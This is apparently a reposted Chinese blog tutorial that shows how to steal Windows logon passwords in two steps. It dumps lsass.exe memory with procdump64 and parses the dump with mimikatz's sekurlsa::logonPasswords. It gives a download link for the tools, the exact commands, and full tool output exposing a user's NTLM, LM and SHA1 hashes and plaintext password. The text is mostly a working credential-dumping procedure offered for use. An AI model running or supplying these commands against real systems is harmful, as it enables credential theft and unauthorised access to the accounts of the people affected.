zoukankan      html  css  js  c++  java
  • 两步完成利用procdump64+mimikatz获取win用户密码

    使用procdump64+mimikatz可实现从内存中获取明文密码

    工具

    1
    链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38

    首先得先获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到, 比如这样

    1.导出lsass.exe

    1
    procdump64.exe -accepteula -ma lsass.exe lsass.dmp

     (注:必须使用管理员权限)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    ProcDump v8.0 - Writes process dump files
    Copyright (C) 2009-2016 Mark Russinovich
    Sysinternals - www.sysinternals.com
    With contributions from Andrew Richards
     
    [15:33:26] Dump 1 initiated: C:UserschengleeDesktopProcdumplsass.dmp
    [15:33:28] Dump 1 writing: Estimated dump file size is 34 MB.
    [15:33:28] Dump 1 complete: 34 MB written in 1.4 seconds
    [15:33:28] Dump count reached.

    2.执行mimikatz

    1
    mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

    (注:必须使用管理员权限)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    ECHO 处于打开状态。
     
      .#####.   mimikatz 2.1.1 (x64) built on Jun 16 2018 18:49:05 - lil!
     .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
     ## / ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     ## / ##       > http://blog.gentilkiwi.com/mimikatz
     '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
      '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
     
    mimikatz(commandline) # sekurlsa::minidump lsass.dmp
    Switch to MINIDUMP : 'lsass.dmp'
     
    mimikatz(commandline) # sekurlsa::logonPasswords full
    Opening : 'lsass.dmp' file for minidump...
     
    Authentication Id : 0 ; 137859 (00000000:00021a83)
    Session           : Interactive from 1
    User Name         : chenglee
    Domain            : chenglee-PC
    Logon Server      : CHENGLEE-PC
    Logon Time        : 2018/7/25 15:06:35
    SID               : S-1-5-21-452281122-3045282507-3243563612-1000
        msv :  
         [00000003] Primary
         * Username : chenglee
         * Domain   : chenglee-PC
         * LM       : 9cffd5e7eefa14babacbf0b4adf55fde
         * NTLM     : 8d0f8e1a18236379538411a9056799f5
         * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20
        tspkg :
         * Username : chenglee
         * Domain   : chenglee-PC
         * Password : lizhenghua
        wdigest :  
         * Username : chenglee
         * Domain   : chenglee-PC
         * Password : lizhenghua
        kerberos : 
         * Username : chenglee
         * Domain   : chenglee-PC
         * Password : lizhenghua
        ssp :  
        credman :  
     
    Authentication Id : 0 ; 137821 (00000000:00021a5d)
    Session           : Interactive from 1
    User Name         : chenglee
    Domain            : chenglee-PC
    Logon Server      : CHENGLEE-PC
    Logon Time        : 2018/7/25 15:06:35
    SID               : S-1-5-21-452281122-3045282507-3243563612-1000
        msv :  
         [00000003] Primary
         * Username : chenglee
         * Domain   : chenglee-PC
         * LM       : 9cffd5e7eefa14babacbf0b4adf55fde
         * NTLM     : 8d0f8e1a18236379538411a9056799f5
         * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20
        tspkg :
         * Username : chenglee
         * Domain   : chenglee-PC
         * Password : lizhenghua
        wdigest :  
         * Username : chenglee
         * Domain   : chenglee-PC
         * Password : lizhenghua
        kerberos : 
         * Username : chenglee
         * Domain   : chenglee-PC
         * Password : lizhenghua
        ssp :  
        credman :  
     
    Authentication Id : 0 ; 997 (00000000:000003e5)
    Session           : Service from 0
    User Name         : LOCAL SERVICE
    Domain            : NT AUTHORITY
    Logon Server      : (null)
    Logon Time        : 2018/7/25 15:06:15
    SID               : S-1-5-19
        msv :  
        tspkg :
        wdigest :  
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos : 
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :  
        credman :  
     
    Authentication Id : 0 ; 996 (00000000:000003e4)
    Session           : Service from 0
    User Name         : CHENGLEE-PC$
    Domain            : WORKGROUP
    Logon Server      : (null)
    Logon Time        : 2018/7/25 15:06:15
    SID               : S-1-5-20
        msv :  
        tspkg :
        wdigest :  
         * Username : CHENGLEE-PC$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos : 
         * Username : chenglee-pc$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :  
        credman :  
     
    Authentication Id : 0 ; 48630 (00000000:0000bdf6)
    Session           : UndefinedLogonType from 0
    User Name         : (null)
    Domain            : (null)
    Logon Server      : (null)
    Logon Time        : 2018/7/25 15:06:06
    SID               :
        msv :  
        tspkg :
        wdigest :  
        kerberos : 
        ssp :  
        credman :  
     
    Authentication Id : 0 ; 999 (00000000:000003e7)
    Session           : UndefinedLogonType from 0
    User Name         : CHENGLEE-PC$
    Domain            : WORKGROUP
    Logon Server      : (null)
    Logon Time        : 2018/7/25 15:06:05
    SID               : S-1-5-18
        msv :  
        tspkg :
        wdigest :  
         * Username : CHENGLEE-PC$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos : 
         * Username : chenglee-pc$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :  
        credman :  
     
    mimikatz(commandline) # exit
    Bye!

     看, 密码[lizhenghua]处于明文暴露状态.

    如果不是使用管理员模式运行cmd会报错,

  • 相关阅读:
    【转】Oracle中的decode在mysql中的等价实现
    Perhaps you are running on a JRE rather than a JDK
    iisapp -a命令出现 :此脚本不能与WScript工作
    HDU 6070 线段树
    HDU 1853 MCMF
    Codeforces 7C 扩展欧几里得
    HDU 5675 智慧数
    Lucas 大组合数
    bzoj 2179 FFT
    POJ 1155 树形背包
  • 原文地址:https://www.cnblogs.com/ssw6/p/13472969.html
Copyright © 2011-2022 走看看